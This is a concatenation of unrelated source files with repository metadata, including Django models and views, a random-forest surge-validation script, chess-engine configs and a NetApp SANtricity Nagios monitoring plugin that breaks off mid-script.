# combine train and validation and let keras split it randomly for you
tv_enc = t_enc + v_enc
with open(PATH / 'test.function', 'r') as f:
h_enc = f.readlines()
with open(PATH / 'train.docstring', 'r') as f:
t_dec = f.readlines()
with open(PATH / 'valid.docstring', 'r') as f:
v_dec = f.readlines()
# combine train and validation and let keras split it randomly for you
tv_dec = t_dec + v_dec
with open(PATH / 'test.docstring', 'r') as f:
h_dec = f.readlines()
with open(PATH / 'train.api_seq', 'r') as f:
t_api = f.readlines()
with open(PATH / 'valid.api_seq', 'r') as f:
v_api = f.readlines()
tv_api = t_api + v_api
with open(PATH / 'train.function_name', 'r') as f:
t_fun = f.readlines()
with open(PATH / 'valid.function_name', 'r') as f:
v_fun = f.readlines()
tv_fun = t_fun + v_fun
with open(PATH / 'test.api_seq', 'r') as f:
h_api = f.readlines()
with open(PATH / 'test.function_name', 'r') as f:
h_fun = f.readlines()
logging.warning(f'Num rows for encoder training + validation input: {len(tv_enc):,}')
logging.warning(f'Num rows for encoder holdout input: {len(h_enc):,}')
logging.warning(f'Num rows for decoder training + validation input: {len(tv_dec):,}')
logging.warning(f'Num rows for decoder holdout input: {len(h_dec):,}')
return tv_enc, h_enc, tv_dec, h_dec, tv_api, h_api, tv_fun, h_fun
def apply_parallel(func: Callable,
data: List[Any],
cpu_cores: int = None) -> List[Any]:
"""
Apply function to list of elements.
Automatically determines the chunk size.
"""
if not cpu_cores:
cpu_cores = cpu_count()
try:
chunk_size = ceil(len(data) / cpu_cores)
pool = Pool(cpu_cores)
transformed_data = pool.map(func, chunked(data, chunk_size), chunksize=1)
finally:
pool.close()
pool.join()
return transformed_data
def flattenlist(listoflists: List[List[Any]]):
return list(chain.from_iterable(listoflists))
processed_data_filenames = [
'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.docstring',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.function',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/test.lineage',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/test_original_function.json.gz',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.docstring',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.function',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/train.lineage',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/train_original_function.json.gz',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.docstring',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.function',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid.lineage',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/valid_original_function.json.gz',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings.function',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings.lineage',
'https://storage.googleapis.com/kubeflow-examples/code_search/data/without_docstrings_original_function.json.gz']
def get_step2_prerequisite_files(output_directory):
outpath = Path(output_directory)
assert not list(outpath.glob('*')), f'There are files in {str(outpath.absolute())},' \
f' please clear files or specify an empty folder.'
outpath.mkdir(exist_ok=True)
print(f'Saving files to {str(outpath.absolute())}')
for url in processed_data_filenames:
print(f'downloading {url}')
wget.download(url, out=str(outpath.absolute()))
def create_nmslib_search_index(numpy_vectors):
"""Create search index using nmslib.
Parameters
==========
numpy_vectors : numpy.array
The matrix of vectors
Returns
=======
nmslib object that has index of numpy_vectors
"""
search_index = nmslib.init(method='hnsw', space='cosinesimil')
search_index.addDataPointBatch(numpy_vectors)
search_index.createIndex({'post': 2}, print_progress=True)
return search_index
| [
"chnsh24@gmail.com"
] | chnsh24@gmail.com |
e5124fdf4ee9e559c3d85652aa15f109ff7c5a64 | ca94248bc112ffb4b877ad7aa1585278c4d94e36 | /project14/urls.py | 934f4139737d3b31110ff97845a9e5bb19134c64 | [] | no_license | madisettydivya/bootstrap | b7d8b8d420da0bcc4dd644971feccf2654e27f18 | 35676ce0d65adfbbb2f69f758c5699cacb25692e | refs/heads/main | 2023-07-13T19:51:19.557914 | 2021-08-24T14:11:42 | 2021-08-24T14:11:42 | 399,489,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | """project14 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from app.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('bootstrap_cdn/',bootstrap_cdn,name='bootstrap_cdn'),
path('bootstrap_download/',bootstrap_download,name='bootstrap_download'),
path('carousel/',carousel,name='carousel'),
]
| [
"madisettysaidivya22@gmail.com"
] | madisettysaidivya22@gmail.com |
23867764f0cc8d30cda919abd564c7282ccb15db | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/201-tideGauge.py | 52b44422312b41361c88c8c467dad6e7167ae1b9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 201
y = 202
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
5ea7785ad2b75c33ec9508d20347b8ab49ea1b2b | 08832b678fb982e4333d41fe19f8eaa278e988f3 | /src/chess_zero/configs/normal.py | 8c5158c49918366b9e5ae230c7a8d33632d859a0 | [
"MIT"
] | permissive | BenisonSam/chessprime | a8710f03a27e3008960cd9fe3b394ed06a16c10b | a020be8669535016d4a1cc2966c9b04ef20c1112 | refs/heads/master | 2020-03-28T10:42:20.788183 | 2018-09-17T09:12:25 | 2018-09-17T09:12:25 | 148,136,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,089 | py | """
Contains the set of configs to use for the "normal" version of the app.
"""
class EvaluateConfig:
def __init__(self):
self.vram_frac = 1.0
self.game_num = 50
self.replace_rate = 0.55
self.play_config = PlayConfig()
self.play_config.simulation_num_per_move = 200
self.play_config.thinking_loop = 1
self.play_config.c_puct = 1 # lower = prefer mean action value
self.play_config.tau_decay_rate = 0.6 # I need a better distribution...
self.play_config.noise_eps = 0
self.evaluate_latest_first = True
self.max_game_length = 1000
class PlayDataConfig:
def __init__(self):
self.min_elo_policy = 500 # 0 weight
self.max_elo_policy = 1800 # 1 weight
self.sl_nb_game_in_file = 250
self.nb_game_in_file = 50
self.max_file_num = 150
class PlayConfig:
def __init__(self):
self.max_processes = 3
self.search_threads = 16
self.vram_frac = 1.0
self.simulation_num_per_move = 800
self.thinking_loop = 1
self.logging_thinking = False
self.c_puct = 1.5
self.noise_eps = 0.25
self.dirichlet_alpha = 0.3
self.tau_decay_rate = 0.99
self.virtual_loss = 3
self.resign_threshold = -0.8
self.min_resign_turn = 5
self.max_game_length = 1000
class TrainerConfig:
def __init__(self):
self.min_data_size_to_learn = 0
self.cleaning_processes = 5 # RAM explosion...
self.vram_frac = 1.0
self.batch_size = 384 # tune this to your gpu memory
self.epoch_to_checkpoint = 1
self.dataset_size = 100000
self.start_total_steps = 0
self.save_model_steps = 25
self.load_data_steps = 100
self.loss_weights = [1.25, 1.0] # [policy, value] prevent value overfit in SL
class ModelConfig:
cnn_filter_num = 256
cnn_first_filter_size = 5
cnn_filter_size = 3
res_layer_num = 7
l2_reg = 1e-4
value_fc_size = 256
distributed = False
input_depth = 18
| [
"benisonsam@hotmail.com"
] | benisonsam@hotmail.com |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0 | 4b46bcb9e3883a57f46d490da424e8d9463ba8aa | /PyFolder/Python_Django/app_integration/apps/appintegrate/models.py | 9f694e3217e40b8ecf4af783c0155140d3aaa317 | [] | no_license | LAdkins81/DojoAssignments | 1752c131454dc6f259d4e84390af218e1a423b50 | 7bc7a92bed72ff37c5d8991e478ffae8fefd82db | refs/heads/master | 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
def addUserToCourse(self, object):
user_id = object['users']
user = User.objects.get(id=user_id)
course_id = object['courses']
course = Course.objects.get(id=course_id)
UserCourse.objects.create(user_id=user, course_id=course)
return {'success' : 'User added to course'}
class UserCourse(models.Model):
user_id = models.ForeignKey(User, null=True, related_name="reg_users")
course_id = models.ForeignKey(Course, related_name="reg_courses")
created_at = models.DateTimeField(auto_now_add=True, null=True)
updated_at = models.DateTimeField(auto_now=True)
objects = UserCourseManager()
| [
"lahell@gmail.com"
] | lahell@gmail.com |
fbac34aabd50a2235d848ef5c7e4c29759c931b6 | 932c4995ce130967d79f2d11045a5768e9e0eae9 | /ccms/models.py | 7a2545967d7da8cf8fbd08acd28eba921c336a40 | [] | no_license | MAHRahat/CCMS-Server | c53cb2448b0feca798ebe75286e0b74edb9716af | 923f5622e6e426d8aa909045e918a08bc094c7d0 | refs/heads/master | 2023-07-05T01:00:27.215293 | 2021-08-21T12:12:52 | 2021-08-21T12:12:52 | 394,878,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,086 | py | from django.contrib.auth.models import AbstractUser
from django.db import models
from ccms.managers import CCMSUserManager
class CCMSUser(AbstractUser):
"""
Custom user model for the City Complaints Management System.
"""
user_id = models.AutoField(primary_key=True)
username = None
first_name = None
last_name = None
email = models.EmailField(unique=True, null=False, blank=False, db_column='email')
cell_no = models.CharField(unique=True, max_length=14, null=True, blank=True)
name = models.CharField(max_length=25, null=True, blank=True)
address = models.TextField(null=True, blank=True)
is_employee = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = CCMSUserManager()
class Meta:
db_table = 'ccms_users'
def __str__(self):
if self.name is None:
return f"{self.email}"
else:
return f"{self.name}"
class Categories(models.Model):
category_id = models.AutoField(primary_key=True, unique=True)
category = models.CharField(max_length=25)
keyword = models.CharField(max_length=25)
class Meta:
db_table = 'ccms_categories'
def __str__(self):
return f"{self.category} {self.keyword}"
class Complaints(models.Model):
complaints_id = models.BigAutoField(primary_key=True, unique=True)
time_submitted = models.DateTimeField(auto_now_add=True)
time_last_updated = models.DateTimeField(auto_now=True)
citizen_id = models.ForeignKey(CCMSUser, on_delete=models.CASCADE)
description = models.TextField(null=True, blank=False)
category_id = models.ForeignKey(Categories, on_delete=models.CASCADE)
status = models.CharField(null=True, max_length=30, default='Submitted')
location = models.TextField(null=True)
class Meta:
db_table = 'ccms_complaints'
def __str__(self):
return f"{self.description}"
def citizen_name(self):
return self.citizen_id.name
def category_name(self):
return self.category_id.category
| [
"fountaein@yandex.com"
] | fountaein@yandex.com |
ee1909557fe8fdc1337bf5aa9e810d27022883ff | 2e3b9b34e5129213c3c9983b859ab87c8e6d4b09 | /src/inventory/dashboard/views.py | c8a285bbab52cc9296a0f7ffafd3450285696e82 | [] | no_license | BryanGmz/inventory | 7fee12c9150cc47528d7fdd195dc9a43b1629534 | bae5eac056e9821fc8757ac19bb57098455ba0dc | refs/heads/main | 2023-08-19T10:23:09.763323 | 2021-10-26T05:25:52 | 2021-10-26T05:25:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,008 | py | from django.contrib.messages.api import error
from django.shortcuts import render
from datetime import datetime
from django.db.models import Sum
import json
from inventory.clients.models import ProductSale, Sale
# Create your views here.
def FirstDayOfMonth():
return datetime.today().replace(day=1).replace(hour=00).replace(minute=00).replace(second=00)
def serialize(objects, name):
array="["
for object in objects:
array+=str(object[name])+","
array=(array[:-1])
array+="]"
return array
def sales_month(firstdayofmonth):
ventas=Sale.objects.extra(select={'dia':'EXTRACT(DAY FROM datetime)', 'total':'total'}).filter(datetime__gte=firstdayofmonth).values('datetime__day').annotate(total=Sum('total')).order_by('datetime__day')
#print('.........')
#print(str(ventas.query))
return ('{"title": {"text": "Ventas del Mes"},"tooltip": {"trigger": "axis"},"legend": {"data": ["Ventas"]},"grid": {"left": "3%","right": "4%","bottom": "3%","containLabel": "true"},"toolbox": {"show": "true","feature": {"dataZoom": {"yAxisIndex": "none"},"dataView": { "readOnly": "false" },"magicType": { "type": ["line", "bar"] },"restore": {},"saveAsImage": {}}},"xAxis": {"type": "category","boundaryGap": "false","data": '+serialize(ventas, 'datetime__day')+'},"yAxis": {"type": "value"},"series": [{"name": "Ventas","type": "line","stack": "Total","data": '+serialize(ventas,'total')+'}]}')
def product_most(firstdayofmonth):
#pubs=ProductSale.objects.select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('sale_id', 'product_id','product__producttype_id', 'product__producttype__category_id', 'product__producttype__category__name', 'sale__datetime')
#pubs=ProductSale.objects.select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'product__producttype__category_id', 'product__producttype__category__name', 'quantity', 'total', 'sale_id', 'product_id', 'sale__datetime')
#pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'product__producttype__category_id', 'product__producttype__category__name', 'quantity', 'total', 'sale__datetime')
pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'quantity', 'total').values('product__producttype_id', 'product__producttype__name').annotate(productos=Sum('quantity')).annotate(total=Sum('total')).order_by('productos')
hola=None
if (len(pubs)>0):
hola=pubs[len(pubs)-1]
#print(hola)
return hola
def product_worst(firstdayofmonth):
pubs=ProductSale.objects.filter(sale__datetime__gte=firstdayofmonth).select_related('sale', 'product', 'product__producttype', 'product__producttype__category').values_list('product__producttype_id', 'product__producttype__name', 'quantity', 'total').values('product__producttype_id', 'product__producttype__name').annotate(productos=Sum('quantity')).annotate(total=Sum('total')).order_by('productos')
hola=None
if (len(pubs)>0):
hola=pubs[0]
#print(hola)
return hola
def dashboard(request):
option=[]
name=[]
firstdayofmonth=FirstDayOfMonth()
#Grafico de ventas del mes
name.append('id_0')
option.append(sales_month(firstdayofmonth))
json_option = json.dumps(option)
json_name = json.dumps(name)
context = {
'options' :json_option ,
'names':json_name,
'most_product':product_most(firstdayofmonth),
'worst_product':product_worst(firstdayofmonth),
}
return render(request,"dashboard/dashboard.html",context)
| [
"jmateo.cys@gmail.com"
] | jmateo.cys@gmail.com |
000bc01dc5ca748102e823a1e0462832615627a0 | 411c6b248cec9388a6424cf50f7d518f3d4d3b52 | /Forum/TestAPI/post/PostDetail.py | 75ad937b7e16647021500b974b7e3c5557740e41 | [] | no_license | ArturAmbartsumov/DBProject | cc44017bdc49eb13aee424bce2d2cfda4d9ba263 | 12f58c51d02fc181fe5b09203430e6503ab8de46 | refs/heads/master | 2021-01-20T06:27:43.399475 | 2014-07-06T01:12:52 | 2014-07-06T01:12:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | import json
import requests
payload = {'related': ['user', 'forum', 'thread'], 'post': '6'}
url = 'http://127.0.0.1:8000/post/details/'
r = requests.get(url, params = payload)
print r.status_code
#print r.text
print r.json() | [
"Artur_pskov@mail.ru"
] | Artur_pskov@mail.ru |
e82a53d75ae0617ec841adac5d5a66b3bdd1931e | 3edec2ab1fe22a5aa8a72583597c3797200b5420 | /plugins/Check_SANtricity_Volume_Status_BYCON.py | 5c560cb99dd103794383679353bfdb96548054e2 | [] | no_license | dupondje/netapp_santricity_nagios | 42adfea65ca495fbee8adcbe5d4063c36d083788 | 8ab202ea01893457b5211ee2b69248362bb5e516 | refs/heads/master | 2022-04-30T19:30:18.976906 | 2017-07-13T09:36:26 | 2017-07-13T09:36:26 | 97,102,738 | 4 | 1 | null | 2022-03-22T09:51:44 | 2017-07-13T09:04:55 | Python | UTF-8 | Python | false | false | 12,653 | py | #!/usr/bin/python
# Copyright 2015 NetApp Inc. All rights reserved.
import sys
import csv
import logging
import SANtricityStorage
from logging.handlers import RotatingFileHandler
serverUrl = "https://10.0.1.30:8443"
mode = ""
listMode = {"RIOP": "readIOps", "WIOP": "writeIOps", "RLAT": "readResponseTime", "WLAT": "writeResponseTime",
"RTHP": "readThroughput", "WTHP": "writeThroughput"}
dirmsg = {"RIOP": "Read IOP", "WIOP": "Write IOP", "RLAT": "Read Latency", "WLAT": "Write Latency",
"RTHP": "Read Throughput", "WTHP": "Write Throughput"}
dirunit = {"RIOP": "MS", "WIOP": "MS", "RLAT": "MS", "WLAT": "MS", "RTHP": "B", "WTHP": "B"}
urlToServer = serverUrl + "/devmgr/v2"
loginUrl = serverUrl + "/devmgr/utils"
logging.basicConfig(format='%(asctime)s - %(name)s : %(message)s', filename='/tmp/nagios-python.log', level=logging.INFO)
handler = RotatingFileHandler('/tmp/nagios-python.log', maxBytes=SANtricityStorage.maxbytes,
backupCount=20)
high = 95.0
low = 0.0
range = ""
username = "rw"
password = "rw"
warningdrive=0
criticaldrive=0
stat = 0
hostipaddress = ""
logger = logging.getLogger("VOLUMESTATBYCONT")
logger.setLevel(logging.INFO)
logger.addHandler(handler)
def get_volume_info(arrayid, controllerids, sessionid, arrayinfo):
global total
global stat
global warningdrive
global criticaldrive
try:
logger.debug("In Volume INFO")
lstOfArraySys = []
lstOfArraySys = SANtricityStorage.get_data_from_REST(urlToServer, sessionid, arrayid,
"analysed-volume-statistics")
if lstOfArraySys and len(lstOfArraySys) > 0:
logger.debug("Response received")
logger.debug(len(lstOfArraySys))
dirdata = {}
arrayidwiseinfo = arrayinfo[arrayid]
controllername = arrayidwiseinfo["controllerLabel"]
keytofatch = listMode[mode]
for lst in lstOfArraySys:
if lst["controllerId"] not in dirdata:
dirdata[lst["controllerId"]] = {"readIOP": 0}
cntconwise = 0
logger.debug(
"Volume Id : " + lst["volumeId"] + ", controllerId : " + lst["controllerId"] + ", poolId : " + lst[
"poolId"] + ", " + keytofatch + " : " + str(round(lst[keytofatch], 2)))
cntconwise = (dirdata[lst["controllerId"]])["readIOP"]
if mode == "RTHP" or mode == "WTHP":
# cntconwise+=(lst[keytofatch] /(1024*1024))
cntconwise += round(lst[keytofatch], 2)
else:
# cntconwise+=lst[keytofatch]/1000
cntconwise += round(lst[keytofatch], 2)
(dirdata[lst["controllerId"]])["readIOP"] = cntconwise
strOutPut = ""
strPerData = ""
showoutput = False
total =len(controllerids)
for lstContId in controllerids:
lstrContData = dirdata[lstContId]
contwiseLat = lstrContData["readIOP"]
if (range== "low" and contwiseLat <=low and contwiseLat >high) or (range =="high" and contwiseLat >=low and contwiseLat <high):
if stat < 1:
stat = 1
warningdrive +=1
showoutput = True
elif (range == "low" and contwiseLat <= high) or (range == "high" and contwiseLat >=high):
if stat < 2:
stat = 2
showoutput = True
criticaldrive +=1
contwiseLat = round(contwiseLat, 2)
if showoutput:
strOutPut += "\nArray Name : " + arrayidwiseinfo["arrayName"] + ", Controller Name : " + \
controllername[lstContId] + ", " + dirmsg[mode] + " : " + str(contwiseLat)
strPerData += arrayidwiseinfo["arrayName"] + "-" + controllername[lstContId] + "=" + str(contwiseLat) + \
dirunit[mode] + ";" + str(low) + ":" + str(low) + ";@" + str(low) + ":" + str(high) + "; "
showoutput = False
dirdata["strOutPut"] = strOutPut
dirdata["strPerData"] = strPerData
return dirdata
else:
print "STATUS UNKNOWN - No details fetched from the array."
sys.exit(3)
except Exception, err:
logger.error("Error in get volume info", exc_info=True)
# return False
def getVolumeState():
global stat
sessionId = SANtricityStorage.login(loginUrl,username,password)
logger.debug("In getVolume State method")
SANtricityStorage.getStorageSystemDetails(urlToServer, sessionId, SANtricityStorage.getTime())
file = SANtricityStorage.getStoragePath() + "/controller.csv"
fileForRead = open(file, "rb")
csvReader = csv.reader(fileForRead, delimiter=",")
firstLine = True
currentArrayId = ""
controllerId = []
arrayInfo = {}
strResultData = ""
strResultPerData = ""
lstResult = []
controllerName = {}
arrayId = ""
for row in csvReader:
if firstLine:
headerList = row
firstLine = False
else:
if hostipaddress and (
row[headerList.index("ip1")] == hostipaddress or row[headerList.index("ip2")] == hostipaddress):
controllerId.append(row[headerList.index("controllerRef")])
controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
arrayId = row[headerList.index("arrayId")]
arrayInfo[arrayId] = {"arrayName": row[headerList.index("arrayName")],
"controllerLabel": controllerName}
elif hostipaddress == "":
arrayId = row[headerList.index("arrayId")]
arrayInfo[arrayId] = {"arrayName": row[headerList.index("arrayName")],
"controllerLabel": controllerName}
if currentArrayId <> arrayId and len(controllerId) <> 0:
(arrayInfo[currentArrayId])["controllerLabel"] = controllerName
lstResult.append(get_volume_info(currentArrayId, controllerId, sessionId, arrayInfo))
controllerId = []
controllerName = {}
controllerId.append(row[headerList.index("controllerRef")])
controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
elif currentArrayId <> arrayId:
controllerId = []
controllerName = {}
controllerId.append(row[headerList.index("controllerRef")])
controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
else:
controllerId.append(row[headerList.index("controllerRef")])
controllerName[row[headerList.index("controllerRef")]] = row[headerList.index("controllerLabel")]
currentArrayId = arrayId
if arrayId:
(arrayInfo[arrayId])["controllerLabel"] = controllerName
lstResult.append(get_volume_info(arrayId, controllerId, sessionId, arrayInfo))
firstPerData = ""
firstLine = True
for listEle in lstResult:
strResultData += listEle["strOutPut"]
if firstLine:
firstPerData = listEle["strPerData"]
strArry = firstPerData.split(" ")
firstPerData = strArry[0]
strResultPerData += strArry[1] + " "
firstLine = False
else:
strResultPerData += listEle["strPerData"]
strResultPerData = strResultPerData.strip()
strResultData = "\nThreshold Values - Range Selector : "+range +", Warning : " + str(low) + ", Critical : " \
+ str(high)+"\nVolume Statistics by Controller\nTotal : "+str(total)+", OK : "+\
str(total -(warningdrive +criticaldrive))+", Warning : "+str(warningdrive)+\
", Critical : "+str(criticaldrive) + strResultData
if stat == 0:
strResult = "OK - All controllers are within defined threshold.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
elif stat == 1:
strResult = "Warning - Some controllers are functioning at threshold values.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
elif stat == 2:
strResult = "Critical - Some controllers are out side threshold values.|" + firstPerData + "\n" + strResultData + "|" + strResultPerData
else:
stat = 3
strResult = "Unknown - Host Ip is not configured with web proxy"
fileForRead.close()
return strResult
try:
logger.info("Hi in file")
if len(sys.argv) < 8:
print "STATUS UNKNOWN - Required parameters not set"
sys.exit(3)
else:
nextelearg = False
argmap = {"mode": "", "hostIp": "", "proxyUrl": "", "warning": "", "critical": "","r":"","username":"","password":""}
argname = ""
for element in sys.argv:
if element.endswith(".py"):
continue
elif nextelearg:
argmap[argname] = element
nextelearg = False
elif element == "-mode":
nextelearg = True
argname = "mode"
elif element == "-warning":
nextelearg = True
argname = "warning"
elif element == "-critical":
nextelearg = True
argname = "critical"
elif element == "-h":
nextelearg = True
argname = "hostIp"
elif element == "-webproxy":
nextelearg = True
argname = "proxyUrl"
elif element == "-username":
nextelearg = True
argname = "username"
elif element == "-password":
nextelearg = True
argname = "password"
elif element == "-r":
nextelearg = True
argname = "r"
elif element == "-debug":
logger = logging.getLogger("VOLUMESTATBYCONT")
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
else:
print "Invalid arguments passed"
sys.exit(3)
serverUrl = "https://" + argmap["proxyUrl"];
urlToServer = serverUrl + "/devmgr/v2"
loginUrl = serverUrl + "/devmgr/utils"
if argmap["r"] != "":
range = argmap["r"]
else:
print "STATUS UNKNOW - No range selector defined."
sys.exit(3)
if range != "low" and range != "high":
print "STATUS UNKNOW - Incorrect value for range selector. It must be either \"low\" or \"high\". "
sys.exit(3)
try:
low = float(argmap["warning"])
except Exception, err:
print "STATUS UNKNOWN - Warning threshold must be numeric"
sys.exit(3)
try:
high = float(argmap["critical"])
except Exception, err:
print "STATUS UNKNOWN - Critical threshold must be numeric"
sys.exit(3)
